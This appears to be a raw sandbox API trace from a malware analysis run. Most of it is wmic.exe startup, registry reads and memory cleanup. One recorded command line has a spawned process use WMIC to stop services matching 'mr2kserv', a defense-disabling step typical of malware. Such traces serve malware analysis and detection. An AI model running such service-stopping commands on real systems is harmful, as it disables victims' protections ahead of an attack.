free (_Block=0x342bf58) [0295.059] free (_Block=0x342aeb8) [0295.059] free (_Block=0x342ae28) [0295.059] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.059] free (_Block=0x342aed0) [0295.059] free (_Block=0x342bad8) [0295.059] free (_Block=0x342ba98) [0295.059] free (_Block=0x342ba58) [0295.059] free (_Block=0x342ba28) [0295.059] free (_Block=0x342b9f8) [0295.059] free (_Block=0x342bb48) [0295.059] free (_Block=0x342bb08) [0295.059] free (_Block=0x342b9b8) [0295.059] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.059] GetCurrentThreadId () returned 0x11f4 [0295.059] ??0CHString@@QAE@PBG@Z () returned 0x2d6f954 [0295.059] ??YCHString@@QAEABV0@PBG@Z () returned 0x2d6f954 [0295.059] lstrlenW (lpString="LIST") returned 4 [0295.059] lstrlenW (lpString="call") returned 4 [0295.059] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0295.059] lstrlenW (lpString="ASSOC") returned 5 [0295.059] lstrlenW (lpString="call") returned 4 [0295.059] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0295.059] lstrlenW (lpString="GET") returned 3 [0295.059] lstrlenW (lpString="call") returned 4 [0295.060] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0295.060] ??1CHString@@QAE@XZ () returned 0x1 [0295.060] WbemLocator:IUnknown:Release (This=0x32a0c10) returned 0x0 [0295.061] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0295.061] _kbhit () returned 0x0 [0295.073] free (_Block=0x3422ee8) [0295.073] free (_Block=0x342ac00) [0295.073] free (_Block=0x342ac18) [0295.073] free (_Block=0x342abb8) [0295.073] free (_Block=0x342ade0) [0295.073] free (_Block=0x342b058) [0295.073] free (_Block=0x342b188) [0295.073] free (_Block=0x3429da8) [0295.073] free (_Block=0x342b208) [0295.073] free (_Block=0x342ac60) [0295.073] free (_Block=0x34229a0) [0295.073] free (_Block=0x3420520) [0295.073] free (_Block=0x342bc88) [0295.073] free (_Block=0x342aca8) [0295.073] free (_Block=0x342ae40) [0295.073] free (_Block=0x342bc48) [0295.073] free (_Block=0x342bc08) [0295.073] free (_Block=0x342ae70) [0295.074] free (_Block=0x342aea0) [0295.074] free (_Block=0x342ae10) [0295.074] free (_Block=0x342bbd8) [0295.074] IUnknown:Release (This=0x3278e30) returned 0x0 [0295.075] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0295.075] free (_Block=0x342b0f0) [0295.075] free (_Block=0x342ac90) [0295.075] free (_Block=0x3420568) [0295.075] free (_Block=0x342ad38) [0295.075] free (_Block=0x342b1c8) [0295.075] free (_Block=0x342acd8) [0295.075] free (_Block=0x3422ce0) [0295.075] free (_Block=0x34226b0) [0295.075] free (_Block=0x34226f8) [0295.075] free (_Block=0x3422740) [0295.075] free (_Block=0x342ae88) [0295.075] free (_Block=0x34227c8) [0295.075] free (_Block=0x3420508) [0295.076] free (_Block=0x3422ae0) [0295.076] free (_Block=0x34204f0) [0295.076] free (_Block=0x3422aa0) [0295.076] free (_Block=0x34204d8) [0295.076] free (_Block=0x3422a40) [0295.076] free (_Block=0x3422908) [0295.076] free (_Block=0x3422920) [0295.076] free (_Block=0x34228d0) [0295.076] free (_Block=0x34228e8) [0295.076] free (_Block=0x3422940) [0295.076] free (_Block=0x3422958) [0295.076] free (_Block=0x34204a0) [0295.076] free (_Block=0x34204b8) [0295.076] free (_Block=0x3422860) [0295.076] free (_Block=0x3422878) [0295.076] free (_Block=0x3422828) [0295.076] free (_Block=0x3422840) [0295.076] free (_Block=0x3422898) [0295.076] free (_Block=0x34228b0) [0295.077] free (_Block=0x34227f0) [0295.077] free (_Block=0x3422808) [0295.077] free (_Block=0x34227a0) [0295.077] free (_Block=0x3421200) [0295.077] free (_Block=0x342afd0) [0295.077] WbemLocator:IUnknown:Release (This=0x3244818) returned 0x2 [0295.077] WbemLocator:IUnknown:Release (This=0x324ae58) returned 0x0 [0295.079] WbemLocator:IUnknown:Release (This=0x3244818) returned 0x1 [0295.079] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0295.079] WbemLocator:IUnknown:Release (This=0x3244818) returned 0x0 [0295.080] free (_Block=0x342ac48) [0295.080] free (_Block=0x342aba0) [0295.080] free (_Block=0x3422d60) [0295.080] free (_Block=0x342acc0) [0295.080] free (_Block=0x342ad20) [0295.080] free (_Block=0x3422ca0) [0295.080] free (_Block=0x342ad80) [0295.080] free (_Block=0x342acf0) [0295.080] free (_Block=0x3422b80) [0295.080] free (_Block=0x342abe8) [0295.080] free (_Block=0x342adf8) [0295.080] free (_Block=0x3422ac0) [0295.080] free (_Block=0x342ab10) [0295.080] free (_Block=0x342adb0) [0295.080] free (_Block=0x3422b60) [0295.080] free (_Block=0x342ad50) [0295.080] free (_Block=0x342ac30) [0295.080] free (_Block=0x3422a80) [0295.080] free (_Block=0x342ab88) [0295.080] free (_Block=0x342adc8) [0295.080] free (_Block=0x3422d00) [0295.080] free (_Block=0x342ab28) [0295.080] free (_Block=0x342ad68) [0295.081] free (_Block=0x3422c80) [0295.081] free (_Block=0x3429838) [0295.081] free (_Block=0x342ad98) [0295.081] free (_Block=0x3422ba0) [0295.081] free (_Block=0x342ab58) [0295.081] free (_Block=0x342ab40) [0295.081] free (_Block=0x3422be0) [0295.081] free (_Block=0x342ad08) [0295.081] free (_Block=0x342ab70) [0295.081] free (_Block=0x3422c60) [0295.081] free (_Block=0x342abd0) [0295.081] free (_Block=0x342ac78) [0295.081] free (_Block=0x3422c20) [0295.081] free (_Block=0x34297f0) [0295.081] free (_Block=0x3429970) [0295.081] free (_Block=0x3422b00) [0295.081] free (_Block=0x34298c8) [0295.081] free (_Block=0x3429910) [0295.081] free (_Block=0x3422a00) [0295.081] free (_Block=0x3429808) [0295.081] free (_Block=0x3429850) [0295.081] free (_Block=0x3422b40) [0295.081] free (_Block=0x3429898) [0295.082] free (_Block=0x3429928) [0295.082] free (_Block=0x3422c00) [0295.082] free (_Block=0x34298b0) [0295.082] free (_Block=0x34299a0) [0295.082] free (_Block=0x3422b20) [0295.082] free (_Block=0x3429958) [0295.082] free (_Block=0x34298f8) [0295.082] free (_Block=0x3422d40) [0295.082] free (_Block=0x34298e0) [0295.082] free (_Block=0x3429940) [0295.082] free (_Block=0x3422bc0) [0295.082] free (_Block=0x3429868) [0295.082] free (_Block=0x3429988) [0295.082] free (_Block=0x3422c40) [0295.082] free (_Block=0x3429820) [0295.082] free (_Block=0x34299b8) [0295.082] free (_Block=0x3422a60) [0295.082] CoUninitialize () [0295.171] exit (_Code=0) [0295.172] free (_Block=0x342aee8) [0295.172] free (_Block=0x3421008) [0295.172] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.172] free (_Block=0x3422e10) [0295.172] free (_Block=0x34227e0) [0295.172] free (_Block=0x3420fe8) [0295.172] free (_Block=0x3420fc8) [0295.172] free (_Block=0x3420f98) [0295.172] free (_Block=0x3420f78) [0295.172] free (_Block=0x3420f48) [0295.172] free (_Block=0x3420f08) [0295.172] free (_Block=0x3420ee8) [0295.172] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.172] free (_Block=0x3422cc0) Thread: id = 270 os_tid = 0x1360 Thread: id = 271 os_tid = 0x135c Thread: id = 272 os_tid = 0x12c8 Thread: id = 273 os_tid = 0x1240 Process: id = "24" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x74c0f000" os_pid = "0x6d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%mr2kserv%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 275 os_tid = 0xd44 [0295.408] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0295.408] __set_app_type (_Type=0x1) [0295.408] __p__fmode () returned 0x776f3c14 [0295.408] __p__commode () returned 0x776f49ec [0295.408] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0295.408] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0295.409] ??0CHString@@QAE@XZ () returned 0xa685ec [0295.409] malloc (_Size=0x18) returned 0x3910ee8 [0295.409] malloc (_Size=0x38) returned 0x3910f08 [0295.409] malloc (_Size=0x28) returned 0x3910f48 [0295.409] malloc (_Size=0x18) returned 0x3910f78 [0295.409] malloc (_Size=0x24) returned 0x3910f98 [0295.409] malloc (_Size=0x18) returned 0x3910fc8 [0295.409] malloc (_Size=0x18) returned 0x3910fe8 [0295.409] ??0CHString@@QAE@XZ () returned 0xa688fc [0295.410] malloc (_Size=0x18) returned 0x3911008 [0295.410] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0295.410] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0295.410] _onexit (_Func=0xa5f370) returned 0xa5f370 [0295.410] _onexit (_Func=0xa5f380) returned 0xa5f380 [0295.410] _onexit (_Func=0xa5f390) returned 0xa5f390 [0295.410] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0295.410] ResolveDelayLoadedAPI () returned 0x74a22590 [0295.411] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0295.416] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0295.426] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x3634870) returned 0x0 [0295.450] GetCurrentProcess () returned 0xffffffff [0295.450] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x323f7f0 | out: TokenHandle=0x323f7f0*=0x194) returned 1 [0295.450] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x323f7ec | out: TokenInformation=0x0, ReturnLength=0x323f7ec) returned 0 [0295.450] malloc (_Size=0x118) returned 0x39126b0 [0295.450] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x39126b0, TokenInformationLength=0x118, ReturnLength=0x323f7ec | out: TokenInformation=0x39126b0, ReturnLength=0x323f7ec) returned 1 [0295.450] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x39126b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0295.450] free (_Block=0x39126b0) [0295.451] CloseHandle (hObject=0x194) returned 1 [0295.451] malloc (_Size=0x40) returned 0x39126b0 [0295.451] malloc (_Size=0x40) returned 0x39126f8 [0295.451] malloc (_Size=0x40) returned 0x3912740 [0295.451] SetThreadUILanguage (LangId=0x0) returned 0x3150409 [0295.454] _vsnwprintf (in: _Buffer=0x3912740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x323f778 | out: _Buffer="ms_409") returned 6 [0295.454] malloc (_Size=0x20) returned 0x3911200 [0295.455] GetComputerNameW (in: lpBuffer=0x3911200, nSize=0x323f7dc | out: lpBuffer="NQDPDE", nSize=0x323f7dc) returned 1 [0295.455] lstrlenW (lpString="NQDPDE") returned 6 [0295.455] malloc (_Size=0xe) returned 0x3912788 [0295.455] lstrlenW (lpString="NQDPDE") returned 6 [0295.455] ResolveDelayLoadedAPI () returned 0x7444db00 [0295.455] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x323f7f0 | out: lpNameBuffer=0x0, nSize=0x323f7f0) returned 0x315a000 [0295.457] GetLastError () returned 0xea [0295.457] malloc (_Size=0x1e) returned 0x39127a0 [0295.457] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x39127a0, nSize=0x323f7f0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x323f7f0) returned 0x1 [0295.457] lstrlenW (lpString="") returned 0 [0295.457] lstrlenW (lpString="NQDPDE") returned 6 [0295.457] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0295.459] lstrlenW (lpString=".") returned 1 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0295.459] lstrlenW (lpString="LOCALHOST") returned 9 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0295.459] free (_Block=0x3912788) [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] malloc (_Size=0xe) returned 0x3912788 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] malloc (_Size=0xe) returned 0x39127c8 [0295.459] lstrlenW (lpString="NQDPDE") returned 6 [0295.459] malloc (_Size=0x4) returned 0x39127e0 [0295.459] malloc (_Size=0xc) returned 0x39127f0 [0295.459] ResolveDelayLoadedAPI () returned 0x7745b870 [0295.470] malloc (_Size=0x18) returned 0x3912808 [0295.470] malloc (_Size=0xc) returned 0x3912828 [0295.470] SysStringLen (param_1="IDENTIFY") returned 0x8 [0295.470] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0295.470] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0295.470] SysStringLen (param_1="IDENTIFY") returned 0x8 [0295.470] malloc (_Size=0x18) returned 0x3912840 [0295.470] malloc (_Size=0xc) returned 0x3912860 [0295.470] SysStringLen (param_1="IMPERSONATE") returned 0xb [0295.470] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0295.470] SysStringLen (param_1="IMPERSONATE") returned 0xb [0295.470] SysStringLen (param_1="IDENTIFY") returned 0x8 [0295.470] SysStringLen (param_1="IDENTIFY") returned 0x8 [0295.470] SysStringLen (param_1="IMPERSONATE") returned 0xb [0295.470] malloc (_Size=0x18) returned 0x3912878 [0295.470] malloc (_Size=0xc) returned 0x3912898 [0295.470] SysStringLen (param_1="DELEGATE") returned 0x8 [0295.470] SysStringLen (param_1="IDENTIFY") returned 0x8 [0295.470] SysStringLen (param_1="DELEGATE") returned 0x8 [0295.470] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0295.471] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0295.471] SysStringLen (param_1="DELEGATE") returned 0x8 [0295.471] malloc (_Size=0x18) returned 0x39128b0 [0295.471] malloc (_Size=0xc) returned 0x39128d0 [0295.471] malloc (_Size=0x18) returned 0x39128e8 [0295.471] malloc (_Size=0xc) returned 0x3912908 [0295.471] SysStringLen (param_1="NONE") returned 0x4 [0295.471] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.471] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.471] SysStringLen (param_1="NONE") returned 0x4 [0295.471] malloc (_Size=0x18) returned 0x3912920 [0295.471] malloc (_Size=0xc) returned 0x3912940 [0295.471] SysStringLen (param_1="CONNECT") returned 0x7 [0295.471] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.471] malloc (_Size=0x18) returned 0x3912958 [0295.471] malloc (_Size=0xc) returned 0x39104a0 [0295.472] SysStringLen (param_1="CALL") returned 0x4 [0295.472] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.472] SysStringLen (param_1="CALL") returned 0x4 [0295.472] SysStringLen (param_1="CONNECT") returned 0x7 [0295.472] malloc (_Size=0x18) returned 0x39104b8 [0295.472] malloc (_Size=0xc) returned 0x39104d8 [0295.472] SysStringLen (param_1="PKT") returned 0x3 [0295.472] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.472] SysStringLen (param_1="PKT") returned 0x3 [0295.472] SysStringLen (param_1="NONE") returned 0x4 [0295.472] SysStringLen (param_1="NONE") returned 0x4 [0295.472] SysStringLen (param_1="PKT") returned 0x3 [0295.472] malloc (_Size=0x18) returned 0x3912a40 [0295.472] malloc (_Size=0xc) returned 0x39104f0 [0295.472] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.472] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.472] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.472] SysStringLen (param_1="NONE") returned 0x4 [0295.472] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.472] SysStringLen (param_1="PKT") returned 0x3 [0295.472] SysStringLen (param_1="PKT") returned 0x3 [0295.472] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.472] malloc (_Size=0x18) returned 0x3912aa0 [0295.472] malloc (_Size=0xc) returned 0x3910508 [0295.472] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0295.472] SysStringLen (param_1="DEFAULT") returned 0x7 [0295.472] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0295.473] SysStringLen (param_1="PKT") returned 0x3 [0295.473] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0295.473] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.473] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0295.473] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0295.473] malloc (_Size=0x18) returned 0x3912a00 [0295.473] malloc (_Size=0x40) returned 0x3910520 [0295.473] malloc (_Size=0x20a) returned 0x39197c8 [0295.473] GetSystemDirectoryW (in: lpBuffer=0x39197c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0295.473] free (_Block=0x39197c8) [0295.473] malloc (_Size=0xc) returned 0x3910568 [0295.473] malloc (_Size=0xc) returned 0x3910580 [0295.473] malloc (_Size=0xc) returned 0x3912d80 [0295.473] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0295.473] SysStringLen (param_1="\\wbem\\") returned 0x6 [0295.473] free (_Block=0x3910568) [0295.473] free (_Block=0x3910580) [0295.473] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0295.473] free (_Block=0x3912d80) [0295.473] malloc (_Size=0xc) returned 0x39199a0 [0295.473] malloc (_Size=0xc) returned 0x3919958 [0295.473] malloc (_Size=0xc) returned 0x39199b8 [0295.474] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0295.474] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0295.474] free (_Block=0x39199a0) [0295.474] free (_Block=0x3919958) [0295.474] GetCurrentThreadId () returned 0xd44 [0295.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x323f300 | out: phkResult=0x323f300*=0x1a0) returned 0x0 [0295.474] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x323f30c, lpcbData=0x323f308*=0x400 | out: lpType=0x0, lpData=0x323f30c*=0x30, lpcbData=0x323f308*=0x4) returned 0x0 [0295.474] _wcsicmp (_String1="0", _String2="1") returned -1 [0295.474] _wcsicmp (_String1="0", _String2="2") returned -2 [0295.474] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x323f308*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x323f308*=0x42) returned 0x0 [0295.474] malloc (_Size=0x86) returned 0x3912d80 [0295.474] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3912d80, lpcbData=0x323f308*=0x42 | out: lpType=0x0, lpData=0x3912d80*=0x25, lpcbData=0x323f308*=0x42) returned 0x0 [0295.474] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0295.474] malloc (_Size=0x42) returned 0x3912e10 [0295.474] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0295.474] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x323f30c, lpcbData=0x323f308*=0x400 | out: lpType=0x0, lpData=0x323f30c*=0x36, lpcbData=0x323f308*=0xc) returned 0x0 [0295.474] _wtol (_String="65536") returned 65536 [0295.474] free (_Block=0x3912d80) [0295.475] RegCloseKey (hKey=0x0) returned 0x6 [0295.475] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x323f79c | out: ppv=0x323f79c*=0x34b45a8) returned 0x0 [0295.494] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x34b45a8, xmlSource=0x323f720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x323f788 | out: isSuccessful=0x323f788*=0xffff) returned 0x0 [0295.703] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x34b45a8, DOMElement=0x323f798 | out: DOMElement=0x323f798*=0x34b6b48) returned 0x0 [0295.704] malloc (_Size=0xc) returned 0x3919880 [0295.704] IXMLDOMElement:getElementsByTagName (in: This=0x34b6b48, tagName="XSLFORMAT", resultList=0x323f794 | out: resultList=0x323f794*=0x34b9ca0) returned 0x0 [0295.705] free (_Block=0x3919880) [0295.705] IXMLDOMNodeList:get_length (in: This=0x34b9ca0, listLength=0x323f790 | out: listLength=0x323f790*=21) returned 0x0 [0295.706] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=0, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.706] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="texttable.xsl") returned 0x0 [0295.706] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.707] malloc (_Size=0xc) returned 0x39198e0 [0295.707] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.707] free (_Block=0x39198e0) [0295.707] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0295.707] malloc (_Size=0xc) returned 0x39198f8 [0295.707] malloc (_Size=0xc) returned 0x39198e0 [0295.707] malloc (_Size=0x18) returned 0x3912b60 [0295.707] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.708] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.708] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.708] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=1, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.708] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="textvaluelist.xsl") returned 0x0 [0295.708] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.708] malloc (_Size=0xc) returned 0x3919988 [0295.708] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.708] free (_Block=0x3919988) [0295.708] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0295.708] malloc (_Size=0xc) returned 0x3919898 [0295.708] malloc (_Size=0xc) returned 0x3919910 [0295.709] SysStringLen (param_1="VALUE") returned 0x5 [0295.709] SysStringLen (param_1="TABLE") returned 0x5 [0295.709] SysStringLen (param_1="TABLE") returned 0x5 [0295.709] SysStringLen (param_1="VALUE") returned 0x5 [0295.709] malloc (_Size=0x18) returned 0x3912ac0 [0295.709] IUnknown:Release (This=0x34b6b88) returned 0x0 [0295.709] IUnknown:Release (This=0x34b9fa8) returned 0x0 [0295.709] IUnknown:Release (This=0x34b9ff8) returned 0x0 [0295.709] IXMLDOMNodeList:get_item (in: This=0x34b9ca0, index=2, listItem=0x323f7b0 | out: listItem=0x323f7b0*=0x34b6b88) returned 0x0 [0295.709] IXMLDOMNode:get_text (in: This=0x34b6b88, text=0x323f7b4 | out: text=0x323f7b4*="textvaluelist.xsl") returned 0x0 [0295.709] IXMLDOMNode:get_attributes (in: This=0x34b6b88, attributeMap=0x323f7ac | out: attributeMap=0x323f7ac*=0x34b9fa8) returned 0x0 [0295.709] malloc (_Size=0xc) returned 0x3919988 [0295.709] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x34b9fa8, name="KEYWORD", namedItem=0x323f7a8 | out: namedItem=0x323f7a8*=0x34b9ff8) returned 0x0 [0295.710] free (_Block=0x3919988) [0295.710] IXMLDOMNode:get_nodeValue (in: This=0x34b9ff8, value=0x323f768 | out: value=0x323f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0295.710] malloc (_Size=0xc) returned 0x39198b0 [0295.710] malloc (_Size=0xc) returned 0x39197f0 